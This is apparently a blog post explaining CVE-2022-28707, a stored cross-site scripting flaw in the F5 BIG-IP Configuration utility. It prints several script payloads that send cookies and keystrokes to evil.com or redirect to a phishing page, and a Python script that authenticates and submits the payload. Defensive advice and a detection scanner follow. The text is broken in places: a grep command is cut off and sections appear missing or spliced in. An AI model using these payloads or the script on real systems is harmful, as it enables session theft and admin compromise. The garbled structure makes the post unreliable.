Summary:  
CVE-2022-28707 exposes a severe vulnerability in certain versions of the F5 BIG-IP system, affecting its web management interface, known as the Configuration Utility or TMUI. If left unpatched, this flaw allows attackers to inject persistent, malicious JavaScript code, creating real risks of privilege escalation, session hijacking, and more.

In this post, we’ll break down what this means, how the exploit works, share code snippets, reference the original advisories, and offer actionable recommendations.

What is CVE-2022-28707?

CVE-2022-28707 is a stored cross-site scripting (XSS) bug found in the Configuration utility of the F5 BIG-IP system. Stored XSS means the attacker’s script isn’t just injected in one visit (like reflected XSS), but is *saved in the application* and appears anytime users load affected pages — until removed.

Affected versions:

- 14.1.x versions before 14.1.4.6

Note: Older, unsupported versions outside these ranges may also be at risk but have not been evaluated or patched.

Official F5 Advisory:  
https://support.f5.com/csp/article/K46421519

How Does The Exploit Work?

The vulnerability lies in an *undisclosed page* of the TMUI (the web UI for system management). Attackers who are able to add crafted input (like setting a system name, note, or another property shown on the TMUI) can inject JavaScript code.

When any administrator or legitimate user views this value in the web UI after it has been tampered with, the browser will execute the attacker's script _with the privilege level of the user who’s viewing the page_.

Real-World Impact

- Session Theft: If an admin loads the malicious page, their session cookie or token can be stolen.

Let’s say the vulnerable input field is a configuration label/description. The attacker submits:

```html
<script>fetch('https://evil.com/steal?c='+document.cookie)</script>
```

Once an administrator logs into TMUI and views the page where this label appears, the code runs in the browser. The fetch makes a request to the attacker’s server, stealing the admin’s session cookie.

Attacker Submission Example

```python
# Notional Python script to automate the attack (using requests)
import requests

# Replace these with actual values for the target F5 BIG-IP TMUI
base_url = "https://bigip.example.com"
url = base_url + "/tmui/vulnerable_endpoint"
session = requests.Session()
session.verify = False

# Authenticate first (if needed)
session.post(base_url + "/tmui/login.jsp", data={"username": "attacker", "password": "password"})

# Submit the malicious label/data
payload = '<script>fetch("https://evil.com/steal?c="+document.cookie)</script>'
data = {"label": payload}

resp = session.post(url, data=data)
print("Payload submitted. Check evil.com for cookies.")
```

What happens next?

When anyone with appropriate access views the affected page, the browser runs the script, sending the user’s cookie to evil.com.

```bash
grep -ri '
```

Use a Proxy Tool:

Tools like Burp Suite can be used to see raw responses when logged into TMUI, making it easier to spot script injections in output.

Exploit Details

- Attack Vector: Admin/authenticated user with the right privilege submits a crafted input.
- User Interaction: Required (admin must load the affected page).
- Privileges Required: Authenticated access (but privilege escalation is possible by capturing higher-privilege sessions).

1. Stealing Session Cookies

```html
<script>
fetch('https://evil.com/steal?cookie=' + document.cookie)
</script>
```

2. Installing JavaScript Keyloggers

```html
<script>
document.onkeypress = function(e){fetch('https://evil.com/log?k='+e.key)}
</script>
```

3. Redirecting the User

```html
<script>window.location='https://evil.com/phish'</script>
```

- Use WAF Rules: If patching isn’t immediately possible, use Web Application Firewall (WAF) rules to block or sanitize script input.

- Monitor for Suspicious Descriptions/Labels: Review free-text fields (names, notes, labels, descriptions) for unexpected HTML or script content.

- Review Logs: Look for evidence of unexpected GET/POST requests or traffic to unknown domains.
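As an added defender-side example (not from the post or from F5), the following Python script does what the grep search and the "monitor for suspicious descriptions/labels" step aim at: it scans a bigip.conf-style export for free-text fields containing script tags, event handlers or javascript: URLs, decoding HTML entities first so encoded payloads are not missed. The field names, indicator patterns and sample export are constructed assumptions for this illustration.

```python
import html
import re

# Indicators of markup or script injected into a free-text field (constructed; tune as needed).
INJECTION_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),          # event handlers: onload=, onerror=, onkeypress=
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(iframe|img|svg|object|embed)\b", re.I),
]
# Free-text fields in a bigip.conf-style export; these field names are an assumption.
FIELD_RE = re.compile(r'^\s*(description|label|notes)\s+"((?:[^"\\]|\\.)*)"', re.I)

def normalize(value: str) -> str:
    """Undo escaped quotes and repeated HTML-entity encoding so hidden markup becomes visible."""
    cur = value.replace('\\"', '"')
    for _ in range(3):                 # bounded loop: stop once decoding is stable
        decoded = html.unescape(cur)
        if decoded == cur:
            break
        cur = decoded
    return cur

def scan_config(text: str) -> list:
    """Return one finding per free-text field whose decoded value hits an indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = FIELD_RE.match(line)
        value = normalize(m.group(2)) if m else ""
        hits = [p.pattern for p in INJECTION_PATTERNS if p.search(value)]
        if hits:
            findings.append({"line": lineno, "field": m.group(1), "value": value, "indicators": hits})
    return findings

# Constructed sample export (not from a real device): a clean entry, a raw <script>
# injection, and an entity-encoded event-handler injection.
SAMPLE_CONFIG = '''ltm pool web_pool {
    description "Production web servers"
}
ltm virtual vs_https {
    description "<script>fetch('https://evil.com/steal?c='+document.cookie)</script>"
}
ltm node app01 {
    description "&lt;img src=x onerror=&quot;fetch('https://evil.com/log')&quot;&gt;"
}'''

if __name__ == "__main__":
    for f in scan_config(SAMPLE_CONFIG):
        print(f"line {f['line']}: {f['field']} matched {f['indicators']}: {f['value'][:60]}")
```

Run it against a saved configuration export (for example the output of a config listing) instead of SAMPLE_CONFIG; the event-handler pattern is deliberately broad and may need narrowing for descriptions that legitimately contain "on...=" text.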

More References

- F5 Security Advisory (K46421519)
- NVD Entry for CVE-2022-28707
- OWASP XSS Cheat Sheet

Conclusion

CVE-2022-28707 is a classic but dangerous stored XSS — targeting sysadmins and operators on F5 BIG-IP appliances. By injecting code that persists across sessions, an attacker only needs a single admin to load the booby-trapped page to compromise your critical network infrastructure.

Patch now, audit your devices, and monitor for suspicious activity. And remember, never trust input — especially on something as sensitive as TMUI.


*Stay secure, and always keep an eye out for seemingly small vulnerabilities like this — they often open the door to the largest risks in your network.*

Timeline

Published on: 05/05/2022 17:15:00 UTC
Last modified on: 05/12/2022 15:30:00 UTC